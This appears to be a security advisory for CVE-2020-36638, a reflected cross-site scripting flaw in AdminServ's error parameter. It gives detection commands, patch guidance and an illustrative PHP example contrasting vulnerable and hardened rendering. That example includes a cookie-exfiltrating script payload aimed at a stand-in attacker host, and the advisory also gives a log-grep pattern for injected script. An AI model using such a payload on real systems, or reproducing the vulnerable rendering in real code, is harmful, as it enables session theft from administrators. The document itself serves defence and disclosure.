Platform
php
Component
adminserv
CVE-2020-36638 is a cross-site scripting (XSS) vulnerability in Chris92de AdminServ. The value of the user-controlled error argument handled by resources/core/adminserv.php reaches the generated page as markup, so an attacker who gets a victim to open a crafted request can run script in that victim's session of the AdminServ interface. Affected are all builds predating the fix commit 9a45087814295de6fb3a3fe38f96293665234da1. Note that this vulnerability only affects a product that is no longer supported by the maintainer.
Successful exploitation of CVE-2020-36638 lets an attacker execute arbitrary JavaScript in the browser of a user of the AdminServ application. Because AdminServ is an administrative interface, the realistic target is an administrator: script running in that session can read session cookies or tokens, issue requests with the victim's privileges, redirect the user to attacker-controlled sites, or alter the displayed page. The impact is therefore bounded by what the victim account can do in AdminServ. Because the project is no longer maintained, no further security updates are expected, and any unpatched installation stays exposed indefinitely.
CVE-2020-36638 was publicly disclosed in December 2022. There is no indication of active exploitation campaigns targeting this vulnerability at this time, and it is not listed in the CISA KEV catalog. The absence of observed exploitation is plausibly explained by the product's unsupported status and small install base rather than by any difficulty in exploiting it. Public proof-of-concept code is not readily available.
Systems still running Chris92de AdminServ despite the product being unsupported are at significant risk. This includes organizations that inherited legacy deployments or run the software in environments they consider non-critical without having assessed the exposure. Shared hosting environments where AdminServ is installed deserve particular attention, since a compromised administrator session there can affect multiple tenants.
• php: Check whether the fix commit 9a45087814295de6fb3a3fe38f96293665234da1 is part of the deployed checkout. The hash is a git commit identifier, not a string inside adminserv.php, so it has to be checked against the repository history (for a deployment without git metadata, compare resources/core/adminserv.php against the patched upstream file instead):
git -C /path/to/adminserv merge-base --is-ancestor 9a45087814295de6fb3a3fe38f96293665234da1 HEAD && echo patched || echo unpatched
• generic web: Monitor access logs for requests to resources/core/adminserv.php whose error parameter carries HTML or script fragments, in raw or URL-encoded form:
grep -iE 'adminserv\.php\?[^ ]*error=[^ ]*(<|%3C|script|onerror|javascript:)' /path/to/access.log
Exploit Status
EPSS
0.25% (percentile 48%)
CVSS Vector
The primary mitigation for CVE-2020-36638 is to apply the patch 9a45087814295de6fb3a3fe38f96293665234da1. Since the product is no longer supported, applying it may require a manual merge and careful testing for compatibility with the existing deployment. As a temporary workaround, apply strict input validation and context-appropriate output encoding to all user-supplied data that adminserv.php reflects into the page, the error parameter first. A web application firewall (WAF) with XSS signatures adds a layer of defense but is not a substitute for the fix, as encoding-based bypasses are routine. Verify the fix by requesting the page with a harmless marker such as error=%3Cb%3Etest%3C%2Fb%3E and confirming that the response contains the encoded text rather than a rendered <b> element; an injected script must not execute.
Apply the patch 9a45087814295de6fb3a3fe38f96293665234da1 available in the project repository. Alternatively, disable or remove the AdminServ component if it is no longer needed, since it receives no support.
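The following PHP is an added illustration and is not AdminServ's own code; the real handler in resources/core/adminserv.php is not reproduced here. It models the vulnerable pattern the advisory describes (an error request parameter written into HTML as-is) next to two hardened forms matching the mitigation above: output encoding for the HTML context, and an allow-list that turns the parameter into a code rather than free text. The function names, the error codes and the payload are assumptions made for the example.

```php
<?php
// Added example, not project code. In the real handler the value would come
// from the request, e.g.  $error = $_GET['error'] ?? '';  and be embedded in
// the rendered page. The three renderers below differ only in how they treat
// that value.

// Hypothetical vulnerable rendering: the raw parameter lands in the page, so
// any markup the requester supplies becomes part of the DOM.
function render_error_vulnerable(string $error): string
{
    return '<div class="error">' . $error . '</div>';
}

// Hardened rendering: encode for the HTML body context where the value is
// emitted. ENT_QUOTES also encodes single quotes, so the same encoder is safe
// inside quoted attributes; ENT_SUBSTITUTE avoids returning an empty string
// (and silently hiding the message) on malformed UTF-8.
function render_error_hardened(string $error): string
{
    $safe = htmlspecialchars($error, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<div class="error">' . $safe . '</div>';
}

// Stricter alternative: treat "error" as a code and map it to server-side
// messages. Unknown codes fall back to a generic message, so attacker
// controlled bytes never reach the page at all. Codes are hypothetical.
const ERROR_MESSAGES = [
    'login'   => 'Login failed.',
    'session' => 'Your session has expired.',
];

function render_error_allowlisted(string $code): string
{
    $message = ERROR_MESSAGES[$code] ?? 'An error occurred.';
    return '<div class="error">' . htmlspecialchars($message, ENT_QUOTES, 'UTF-8') . '</div>';
}

// Regression check of the kind suggested under mitigation: after the fix, a
// script tag supplied in the parameter must not appear verbatim in the output.
function contains_raw_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed payload: a cookie-exfiltrating script, the classic XSS impact
// described in the advisory. A real attack would deliver it via a crafted link.
$payload = '<script>location="https://attacker.example/?c="+document.cookie</script>';

foreach ([
    'vulnerable'   => render_error_vulnerable($payload),
    'hardened'     => render_error_hardened($payload),
    'allow-listed' => render_error_allowlisted($payload),
] as $label => $html) {
    $verdict = contains_raw_script($html) ? 'SCRIPT REFLECTED' : 'safe';
    echo str_pad($label, 13) . $verdict . PHP_EOL . '    ' . $html . PHP_EOL;
}
```

Running this with php from the command line prints the vulnerable renderer echoing the script tag unchanged and both hardened renderers neutralising it. The allow-list variant is the better fit for an error indicator, since there is no legitimate reason for that parameter to carry arbitrary text; output encoding remains necessary wherever free-form user data genuinely has to be displayed.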
CVE-2020-36638 is a cross-site scripting (XSS) vulnerability in Chris92de AdminServ that lets attackers inject script through the error argument handled by resources/core/adminserv.php.
You are affected if you run a build of Chris92de AdminServ that does not include the fix commit 9a45087814295de6fb3a3fe38f96293665234da1.
Apply the patch 9a45087814295de6fb3a3fe38f96293665234da1. Consider input validation and WAF rules as temporary workarounds.
There is no current indication of active exploitation campaigns targeting CVE-2020-36638.
Due to the product being unsupported, a formal advisory may not be available. Refer to the vulnerability description and associated patch information.